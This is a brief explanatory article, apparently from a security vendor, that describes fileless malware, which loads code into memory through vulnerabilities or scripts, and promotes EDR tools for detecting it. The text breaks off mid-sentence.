The Threat that Directly Loads Malicious Code into Memory
Cyber threat actors are constantly developing more and more sophisticated techniques to infect systems. The best-known method is using files that contain and inject malware, sent through systems such as email or via web downloads. However, in recent years the industry has seen a sharp rise in a much more complex form of attack – fileless malware. But what exactly is it?
Instead of installing a malicious application on the victim’s hard drive like traditional malware, fileless malware is a threat that directly loads malicious code into memory. It tends to use two entry vectors: either it exploits an existing vulnerability in a program the victim uses or it gets in through a file that’s not installed as such, like a script. Fileless malware often injects its code into the memory of existing programs, which makes it very difficult for conventional antivirus solutions to detect.
If this malware has already managed to get in, EDR solutions enable organizations to reduce detection and response time and therefore recovery time thanks to the post-execution functionalities.
Although these techniques are not that new, there has been exponential growth in cases since 2016 (in fact,…